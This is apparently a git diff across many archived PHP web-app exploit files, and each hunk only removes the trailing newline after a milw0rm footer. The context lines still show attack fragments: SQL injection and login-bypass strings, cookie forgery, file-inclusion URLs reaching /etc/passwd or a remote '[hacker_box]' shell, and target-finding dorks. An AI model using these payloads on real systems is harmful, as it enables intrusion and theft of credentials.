bc270161b..2cd247b31 100755 --- a/platforms/php/webapps/8454.txt +++ b/platforms/php/webapps/8454.txt @@ -28,4 +28,4 @@ the command. ############################################################################################ -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8455.txt b/platforms/php/webapps/8455.txt index 5d4f495d2..bdf3cc1e2 100755 --- a/platforms/php/webapps/8455.txt +++ b/platforms/php/webapps/8455.txt @@ -47,4 +47,4 @@ ========================================================================================== -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8457.txt b/platforms/php/webapps/8457.txt index 8c2e62a58..483a44430 100755 --- a/platforms/php/webapps/8457.txt +++ b/platforms/php/webapps/8457.txt @@ -22,4 +22,4 @@ THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL ALL www.SnakespC.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8459.htm b/platforms/php/webapps/8459.htm index ee5a3b7bd..88c4f58b9 100755 --- a/platforms/php/webapps/8459.htm +++ b/platforms/php/webapps/8459.htm @@ -59,4 +59,4 @@ -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8460.txt b/platforms/php/webapps/8460.txt index baa88e7c8..32fac2210 100755 --- a/platforms/php/webapps/8460.txt +++ b/platforms/php/webapps/8460.txt @@ -26,4 +26,4 @@ http://target/path/theme/format.php?_page_content=[shell.txt?] __h0__ -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8461.txt b/platforms/php/webapps/8461.txt index aafd99356..4a0bbcba5 100755 --- a/platforms/php/webapps/8461.txt +++ b/platforms/php/webapps/8461.txt @@ -42,4 +42,4 @@ # ######################################################################################################################## -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8464.txt b/platforms/php/webapps/8464.txt index a53ab74c7..db0a7faf8 100755 --- a/platforms/php/webapps/8464.txt +++ b/platforms/php/webapps/8464.txt @@ -58,4 +58,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8468.txt b/platforms/php/webapps/8468.txt index 246976b13..8436ddc58 100755 --- a/platforms/php/webapps/8468.txt +++ b/platforms/php/webapps/8468.txt @@ -39,4 +39,4 @@ d00rk: intext:"site powered by limbo" inurl:task=register tyko dla babci i Gorionka , sIdq , condiego , 0ina , J.Busha , Nejmo , and all friend in a whole planet Sorry for my poor english ;D -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8471.txt b/platforms/php/webapps/8471.txt index 9fab6a1d0..31d6f539c 100755 --- a/platforms/php/webapps/8471.txt +++ b/platforms/php/webapps/8471.txt @@ -197,4 +197,4 @@ CCC_CODE=lala' UNION ALL SELECT * FROM members WHERE id='1 //select first user= -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8472.txt b/platforms/php/webapps/8472.txt index 140447e62..bf2ef949f 100755 --- a/platforms/php/webapps/8472.txt +++ b/platforms/php/webapps/8472.txt @@ -131,4 +131,4 @@ e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /* -- -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8473.pl b/platforms/php/webapps/8473.pl index f0bd1d93b..d647d0a31 100755 --- a/platforms/php/webapps/8473.pl +++ b/platforms/php/webapps/8473.pl @@ -329,4 +329,4 @@ print "\t\t------------------------EOF----------------------\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8474.txt b/platforms/php/webapps/8474.txt index fb90fac92..cd6c6cb11 100755 --- a/platforms/php/webapps/8474.txt +++ b/platforms/php/webapps/8474.txt @@ -23,4 +23,4 @@ dork: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8475.txt b/platforms/php/webapps/8475.txt index 62485909a..1c1ab2910 100755 --- a/platforms/php/webapps/8475.txt +++ b/platforms/php/webapps/8475.txt @@ -41,4 +41,4 @@ Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zo end. -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8476.txt b/platforms/php/webapps/8476.txt index 726b06aca..b01f2d3d9 100755 --- a/platforms/php/webapps/8476.txt +++ b/platforms/php/webapps/8476.txt @@ -44,4 +44,4 @@ Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zo end. -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8477.txt b/platforms/php/webapps/8477.txt index 1b6a28439..a1806f2a5 100755 --- a/platforms/php/webapps/8477.txt +++ b/platforms/php/webapps/8477.txt @@ -24,4 +24,4 @@ THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL ALL www.SnakespC.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-04-17] +# milw0rm.com [2009-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/8480.txt b/platforms/php/webapps/8480.txt index d76b0bc90..f5a9c45ef 100755 --- a/platforms/php/webapps/8480.txt +++ b/platforms/php/webapps/8480.txt @@ -85,4 +85,4 @@ files. http://www.site.com/path/index.php?page=../../../../../etc/passwd -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8481.txt b/platforms/php/webapps/8481.txt index 33b80f78b..8f18bae33 100755 --- a/platforms/php/webapps/8481.txt +++ b/platforms/php/webapps/8481.txt @@ -23,4 +23,4 @@ website: http://www.hack0wn.com/ __h0__ -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8482.txt b/platforms/php/webapps/8482.txt index 3524bbfd6..d3a67ec92 100755 --- a/platforms/php/webapps/8482.txt +++ b/platforms/php/webapps/8482.txt @@ -28,4 +28,4 @@ Dan buat semuanya yg ga bisa di sebut satu² [+]=================================================================[+] -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8483.txt b/platforms/php/webapps/8483.txt index bbb10262f..71b267dcf 100755 --- a/platforms/php/webapps/8483.txt +++ b/platforms/php/webapps/8483.txt @@ -110,4 +110,4 @@ or - /path/sections/10_Control_Center/phpinfo.php where 10 can be different number (max 20 i think) -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8486.txt b/platforms/php/webapps/8486.txt index 51f72eed0..1404e675e 100755 --- a/platforms/php/webapps/8486.txt +++ b/platforms/php/webapps/8486.txt @@ -35,4 +35,4 @@ javascript:document.cookie="sAuth=3;path=/"; [~]-------------------------------------------------------------------------------- -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8487.txt b/platforms/php/webapps/8487.txt index 1375ee340..40068cb26 100755 --- a/platforms/php/webapps/8487.txt +++ b/platforms/php/webapps/8487.txt @@ -23,4 +23,4 @@ THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL ALL www.SnakespC.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8488.pl b/platforms/php/webapps/8488.pl index a59b109f3..0138199e3 100755 --- a/platforms/php/webapps/8488.pl +++ b/platforms/php/webapps/8488.pl @@ -73,4 +73,4 @@ for($i = 0;$i < 50; $i++) print "\n"; -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8491.pl b/platforms/php/webapps/8491.pl index 66ff44423..001b775f2 100755 --- a/platforms/php/webapps/8491.pl +++ b/platforms/php/webapps/8491.pl @@ -293,4 +293,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8492.txt b/platforms/php/webapps/8492.txt index a034d4fb3..02392c37d 100755 --- a/platforms/php/webapps/8492.txt +++ b/platforms/php/webapps/8492.txt @@ -35,4 +35,4 @@ javascript:document.cookie="WBNEWS=1;path=/"; [~]-------------------------------------------------------------------------------- -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8493.txt b/platforms/php/webapps/8493.txt index bcd7580eb..876431eb0 100755 --- a/platforms/php/webapps/8493.txt +++ b/platforms/php/webapps/8493.txt @@ -181,4 +181,4 @@ EXPLOITS: -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8494.txt b/platforms/php/webapps/8494.txt index f087fdb97..961c93f16 100755 --- a/platforms/php/webapps/8494.txt +++ b/platforms/php/webapps/8494.txt @@ -35,4 +35,4 @@ http://www.sitename.com/config.php?inc_dir=ShellURL //***********************************************************************// //***********************************************************************// -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8495.pl b/platforms/php/webapps/8495.pl index d2fb7569f..48f79a35c 100755 --- a/platforms/php/webapps/8495.pl +++ b/platforms/php/webapps/8495.pl @@ -233,4 +233,4 @@ sub e107::Login } } -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8496.htm b/platforms/php/webapps/8496.htm index 63f46ade0..62186174c 100755 --- a/platforms/php/webapps/8496.htm +++ b/platforms/php/webapps/8496.htm @@ -104,4 +104,4 @@
-# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8497.txt b/platforms/php/webapps/8497.txt index 841a1a3d4..9a7299530 100755 --- a/platforms/php/webapps/8497.txt +++ b/platforms/php/webapps/8497.txt @@ -73,4 +73,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8498.txt b/platforms/php/webapps/8498.txt index 269f0f02e..9db35c911 100755 --- a/platforms/php/webapps/8498.txt +++ b/platforms/php/webapps/8498.txt @@ -51,4 +51,4 @@ -# milw0rm.com [2009-04-20] +# milw0rm.com [2009-04-20] \ No newline at end of file diff --git a/platforms/php/webapps/8499.php b/platforms/php/webapps/8499.php index 22364b237..a2729051f 100755 --- a/platforms/php/webapps/8499.php +++ b/platforms/php/webapps/8499.php @@ -141,4 +141,4 @@ if (preg_match("/<\/html>/", $response)) die("[-] Exploit failed (No users onlin ?> -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8501.txt b/platforms/php/webapps/8501.txt index 6da240a85..66e9a3846 100755 --- a/platforms/php/webapps/8501.txt +++ b/platforms/php/webapps/8501.txt @@ -15,4 +15,4 @@ [+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x [+]-------------------------------------[+] -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8502.txt b/platforms/php/webapps/8502.txt index b7226fac2..e26fe90aa 100755 --- a/platforms/php/webapps/8502.txt +++ b/platforms/php/webapps/8502.txt @@ -27,4 +27,4 @@ ######################################################################### -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8503.txt b/platforms/php/webapps/8503.txt index be79f0cd4..69cd74de0 100755 --- a/platforms/php/webapps/8503.txt +++ b/platforms/php/webapps/8503.txt @@ -20,4 +20,4 @@ Line 115 : if(!empty($include)) require_once($inc_dir.$include); ########################################################################################## -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8504.txt b/platforms/php/webapps/8504.txt index bfbfa78d9..e870feb48 100755 --- a/platforms/php/webapps/8504.txt +++ b/platforms/php/webapps/8504.txt @@ -40,4 +40,4 @@ The End ========= -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8505.txt b/platforms/php/webapps/8505.txt index 0b7f0cae5..d5d77cf6d 100755 --- a/platforms/php/webapps/8505.txt +++ b/platforms/php/webapps/8505.txt @@ -18,4 +18,4 @@ [+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x [+]-------------------------------------[+] -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8506.txt b/platforms/php/webapps/8506.txt index c8ecc9fac..5c36dc430 100755 --- a/platforms/php/webapps/8506.txt +++ b/platforms/php/webapps/8506.txt @@ -16,4 +16,4 @@ [+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x [+]-------------------------------------[+] -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8508.txt b/platforms/php/webapps/8508.txt index 2d5e04e52..86c49b83e 100755 --- a/platforms/php/webapps/8508.txt +++ b/platforms/php/webapps/8508.txt @@ -26,4 +26,4 @@ in username : admin 'or' 1=1 in password : ############################### -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8509.txt b/platforms/php/webapps/8509.txt index 4999f7374..667ff11b9 100755 --- a/platforms/php/webapps/8509.txt +++ b/platforms/php/webapps/8509.txt @@ -26,4 +26,4 @@ Control Panle Bypassed :) [~] [~]-------------------------------------------------------------------------------- -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8510.txt b/platforms/php/webapps/8510.txt index 5ca5daf93..119af3952 100755 --- a/platforms/php/webapps/8510.txt +++ b/platforms/php/webapps/8510.txt @@ -102,4 +102,4 @@ I'm sure that SQL Injection (or Blind) is here but with this, for what? -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-21] +# milw0rm.com [2009-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/8513.pl b/platforms/php/webapps/8513.pl index b70938ed3..197cf4e6e 100755 --- a/platforms/php/webapps/8513.pl +++ b/platforms/php/webapps/8513.pl @@ -144,4 +144,4 @@ sub x__usage() exit; } -# milw0rm.com [2009-04-22] +# milw0rm.com [2009-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/8514.txt b/platforms/php/webapps/8514.txt index 562e572d2..cdcf9ba96 100755 --- a/platforms/php/webapps/8514.txt +++ b/platforms/php/webapps/8514.txt @@ -27,4 +27,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-04-22] +# milw0rm.com [2009-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/8515.txt b/platforms/php/webapps/8515.txt index 97f618681..fb9f58dc3 100755 --- a/platforms/php/webapps/8515.txt +++ b/platforms/php/webapps/8515.txt @@ -36,4 +36,4 @@ http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php --[ End Of File ]------------------------------------------------------- -# milw0rm.com [2009-04-22] +# milw0rm.com [2009-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/8516.txt b/platforms/php/webapps/8516.txt index 173cf4ed8..3da17918b 100755 --- a/platforms/php/webapps/8516.txt +++ b/platforms/php/webapps/8516.txt @@ -42,4 +42,4 @@ http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]%00 || || OoO OoO -# milw0rm.com [2009-04-22] +# milw0rm.com [2009-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/8517.txt b/platforms/php/webapps/8517.txt index 44fa540d4..8ec67ff60 100755 --- a/platforms/php/webapps/8517.txt +++ b/platforms/php/webapps/8517.txt @@ -88,4 +88,4 @@ your freemail account for Joomla's account notification! */ /* jdc 2009 */ -# milw0rm.com [2009-04-22] +# milw0rm.com [2009-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/8521.txt b/platforms/php/webapps/8521.txt index 52de73c0f..581943479 100755 --- a/platforms/php/webapps/8521.txt +++ b/platforms/php/webapps/8521.txt @@ -157,4 +157,4 @@ Boom! -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-23] +# milw0rm.com [2009-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/8532.txt b/platforms/php/webapps/8532.txt index f52137acf..7ad22a379 100755 --- a/platforms/php/webapps/8532.txt +++ b/platforms/php/webapps/8532.txt @@ -146,4 +146,4 @@ Search Post Form --> "> ####################################################################### ####################################################################### -# milw0rm.com [2009-04-24] +# milw0rm.com [2009-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/8533.txt b/platforms/php/webapps/8533.txt index 04043d480..6a5e3fce1 100755 --- a/platforms/php/webapps/8533.txt +++ b/platforms/php/webapps/8533.txt @@ -59,4 +59,4 @@ You must sanitise any user input. ************************************************* -# milw0rm.com [2009-04-24] +# milw0rm.com [2009-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/8538.txt b/platforms/php/webapps/8538.txt index 366812ed9..7e31668d4 100755 --- a/platforms/php/webapps/8538.txt +++ b/platforms/php/webapps/8538.txt @@ -22,4 +22,4 @@ http://forums.invisionpower.com/index.php?app=core&module=ajax§ion=register& ================================================================================ -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8539.txt b/platforms/php/webapps/8539.txt index ed2793c8d..21ad102a9 100755 --- a/platforms/php/webapps/8539.txt +++ b/platforms/php/webapps/8539.txt @@ -30,4 +30,4 @@ Dan buat semuanya yg ga bisa di sebut satu² [+]=================================================================[+] -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8543.php b/platforms/php/webapps/8543.php index 94071653a..6e8d27c99 100755 --- a/platforms/php/webapps/8543.php +++ b/platforms/php/webapps/8543.php @@ -155,4 +155,4 @@ while(1) ?> -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8545.txt b/platforms/php/webapps/8545.txt index 5e42332c0..3725c5b13 100755 --- a/platforms/php/webapps/8545.txt +++ b/platforms/php/webapps/8545.txt @@ -36,4 +36,4 @@ [~] http://www.customprintedsweatshirts.com/links/index.php?PID="> [~]------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8546.txt b/platforms/php/webapps/8546.txt index 858ba2738..1f0f17663 100755 --- a/platforms/php/webapps/8546.txt +++ b/platforms/php/webapps/8546.txt @@ -12,4 +12,4 @@ ########################################################################################## -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8547.txt b/platforms/php/webapps/8547.txt index 409770cca..13211b27e 100755 --- a/platforms/php/webapps/8547.txt +++ b/platforms/php/webapps/8547.txt @@ -177,4 +177,4 @@ Your shell in --> http://[HOST]/[HOME_PATH]/public/shell.php ####################################################################### ####################################################################### -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8548.txt b/platforms/php/webapps/8548.txt index 9f74fcd5f..8500130dc 100755 --- a/platforms/php/webapps/8548.txt +++ b/platforms/php/webapps/8548.txt @@ -24,4 +24,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8549.txt b/platforms/php/webapps/8549.txt index c2820b0dd..e5ed7ff71 100755 --- a/platforms/php/webapps/8549.txt +++ b/platforms/php/webapps/8549.txt @@ -23,4 +23,4 @@ if (file_exists($filename)) { ########################################################################################## -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8550.txt b/platforms/php/webapps/8550.txt index a4321d74f..69020946b 100755 --- a/platforms/php/webapps/8550.txt +++ b/platforms/php/webapps/8550.txt @@ -26,4 +26,4 @@ And ALL Members Of anti-intruders.org ALL My Friends (Dz) [+]-------------------------------------[+] -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8551.txt b/platforms/php/webapps/8551.txt index 62ec589e8..1bceb660e 100755 --- a/platforms/php/webapps/8551.txt +++ b/platforms/php/webapps/8551.txt @@ -26,4 +26,4 @@ And ALL Members Of anti-intruders.org ALL My Friends (Dz) [+]-------------------------------------[+] -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8552.txt b/platforms/php/webapps/8552.txt index 9c9f86488..dfe130d7f 100755 --- a/platforms/php/webapps/8552.txt +++ b/platforms/php/webapps/8552.txt @@ -26,4 +26,4 @@ And ALL Members Of anti-intruders.org ALL My Friends (Dz) [+]-------------------------------------[+] -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8553.htm b/platforms/php/webapps/8553.htm index 7a811b0ea..2738bcb02 100755 --- a/platforms/php/webapps/8553.htm +++ b/platforms/php/webapps/8553.htm @@ -49,4 +49,4 @@ -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8555.txt b/platforms/php/webapps/8555.txt index 8b5b1f05e..8bf7554c2 100755 --- a/platforms/php/webapps/8555.txt +++ b/platforms/php/webapps/8555.txt @@ -18,4 +18,4 @@ homepage : http://www.zakkis.ca./index.php?p=39 ############################################################## -# milw0rm.com [2009-04-27] +# milw0rm.com [2009-04-27] \ No newline at end of file diff --git a/platforms/php/webapps/8557.htm b/platforms/php/webapps/8557.htm index 49b498263..2aa03a488 100755 --- a/platforms/php/webapps/8557.htm +++ b/platforms/php/webapps/8557.htm @@ -40,4 +40,4 @@ -# milw0rm.com [2009-04-28] +# milw0rm.com [2009-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/8558.txt b/platforms/php/webapps/8558.txt index 5eb911471..021cb7dc7 100755 --- a/platforms/php/webapps/8558.txt +++ b/platforms/php/webapps/8558.txt @@ -124,4 +124,4 @@ anything%')) union all select 1,database(),database(),concat(user,'--::--',pass) ####################################################################### ####################################################################### -# milw0rm.com [2009-04-28] +# milw0rm.com [2009-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/8559.c b/platforms/php/webapps/8559.c index af30a2126..2e17fb332 100755 --- a/platforms/php/webapps/8559.c +++ b/platforms/php/webapps/8559.c @@ -122,4 +122,4 @@ int main (int argc,char **argv) return 0; } -// milw0rm.com [2009-04-28] +// milw0rm.com [2009-04-28] \ No newline at end of file diff --git a/platforms/php/webapps/8563.txt b/platforms/php/webapps/8563.txt index eb697ac3f..0fe748b01 100755 --- a/platforms/php/webapps/8563.txt +++ b/platforms/php/webapps/8563.txt @@ -43,4 +43,4 @@ ALL www.Snakespc.com/sc >>>> Members str0ke.....>>>>.....milw0rm =================================================================================================================== -# milw0rm.com [2009-04-29] +# milw0rm.com [2009-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/8565.txt b/platforms/php/webapps/8565.txt index 9703def73..adeb1be12 100755 --- a/platforms/php/webapps/8565.txt +++ b/platforms/php/webapps/8565.txt @@ -121,4 +121,4 @@ Return --> username:::password (md5 hash) of admin and database (in title too). ####################################################################### ####################################################################### -# milw0rm.com [2009-04-29] +# milw0rm.com [2009-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/8566.txt b/platforms/php/webapps/8566.txt index f96779f29..8fd58cbd7 100755 --- a/platforms/php/webapps/8566.txt +++ b/platforms/php/webapps/8566.txt @@ -45,4 +45,4 @@ http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi] [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-04-29] +# milw0rm.com [2009-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/8567.txt b/platforms/php/webapps/8567.txt index 375f3c0c3..bcdec78e6 100755 --- a/platforms/php/webapps/8567.txt +++ b/platforms/php/webapps/8567.txt @@ -30,4 +30,4 @@ a protected abstract virtual base pure virtual private destructor, and when was the last time you needed one?" -- Tom Cargil. -# milw0rm.com [2009-04-29] +# milw0rm.com [2009-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/857.txt b/platforms/php/webapps/857.txt index 51fea20ab..bdfe31d22 100755 --- a/platforms/php/webapps/857.txt +++ b/platforms/php/webapps/857.txt @@ -3,4 +3,4 @@ Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/ -# milw0rm.com [2005-03-05] +# milw0rm.com [2005-03-05] \ No newline at end of file diff --git a/platforms/php/webapps/8571.txt b/platforms/php/webapps/8571.txt index 6ce9afff4..adfea45a4 100755 --- a/platforms/php/webapps/8571.txt +++ b/platforms/php/webapps/8571.txt @@ -50,4 +50,4 @@ And ALL Members Of anti-intruders.org ALL My Friends (Dz) [+]-------------------------------------[+] -# milw0rm.com [2009-04-29] +# milw0rm.com [2009-04-29] \ No newline at end of file diff --git a/platforms/php/webapps/8576.pl b/platforms/php/webapps/8576.pl index b6f4eb49c..b5353af80 100755 --- a/platforms/php/webapps/8576.pl +++ b/platforms/php/webapps/8576.pl @@ -326,4 +326,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-04-30] +# milw0rm.com [2009-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/8577.txt b/platforms/php/webapps/8577.txt index fd789e839..ff0cb319e 100755 --- a/platforms/php/webapps/8577.txt +++ b/platforms/php/webapps/8577.txt @@ -179,4 +179,4 @@ Search: ####################################################################### ####################################################################### -# milw0rm.com [2009-04-30] +# milw0rm.com [2009-04-30] \ No newline at end of file diff --git a/platforms/php/webapps/858.txt b/platforms/php/webapps/858.txt index b81aeb3e9..fa7004f60 100755 --- a/platforms/php/webapps/858.txt +++ b/platforms/php/webapps/858.txt @@ -41,4 +41,4 @@ Open your browser and surf to forum. You'll now be automatically logged in having admin right :) -# milw0rm.com [2005-03-05] +# milw0rm.com [2005-03-05] \ No newline at end of file diff --git a/platforms/php/webapps/8585.txt b/platforms/php/webapps/8585.txt index 0a6be6f00..c16740a6c 100755 --- a/platforms/php/webapps/8585.txt +++ b/platforms/php/webapps/8585.txt @@ -30,4 +30,4 @@ _________ _____ __ And Change Configurations. Hacker can also use this to include a malicious file into config.php by injecting php code into table_prefix field (in Installation Page - Step 1). -# milw0rm.com [2009-05-01] +# milw0rm.com [2009-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/8586.txt b/platforms/php/webapps/8586.txt index 9b5821eeb..f5d35ebdf 100755 --- a/platforms/php/webapps/8586.txt +++ b/platforms/php/webapps/8586.txt @@ -118,4 +118,4 @@ Return --> nick:::password(md5 hash) ####################################################################### ####################################################################### -# milw0rm.com [2009-05-01] +# milw0rm.com [2009-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/8587.htm b/platforms/php/webapps/8587.htm index d4b091cd0..13540eac4 100755 --- a/platforms/php/webapps/8587.htm +++ b/platforms/php/webapps/8587.htm @@ -117,4 +117,4 @@ Exploit by y3nh4ck3r. Contact: y3nh4ck3r@gmail.com ####################################################################### --> -# milw0rm.com [2009-05-01] +# milw0rm.com [2009-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/8593.txt b/platforms/php/webapps/8593.txt index 56e4f1e00..6c9509dcb 100755 --- a/platforms/php/webapps/8593.txt +++ b/platforms/php/webapps/8593.txt @@ -13,4 +13,4 @@ ######################################################################################################## -# milw0rm.com [2009-05-01] +# milw0rm.com [2009-05-01] \ No newline at end of file diff --git a/platforms/php/webapps/8599.txt b/platforms/php/webapps/8599.txt index f23840440..c3ff6765f 100755 --- a/platforms/php/webapps/8599.txt +++ b/platforms/php/webapps/8599.txt @@ -24,4 +24,4 @@ ThE g0bL!N - spyboy - red virus - virus_hima all my Friends -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/860.c b/platforms/php/webapps/860.c index 2d8f4a407..96fbc5a1e 100755 --- a/platforms/php/webapps/860.c +++ b/platforms/php/webapps/860.c @@ -103,4 +103,4 @@ int main(int argc,char *argv[]) return 0; } -// milw0rm.com [2005-03-07] +// milw0rm.com [2005-03-07] \ No newline at end of file diff --git a/platforms/php/webapps/8600.txt b/platforms/php/webapps/8600.txt index 467063b50..7be482f42 100755 --- a/platforms/php/webapps/8600.txt +++ b/platforms/php/webapps/8600.txt @@ -22,4 +22,4 @@ THE 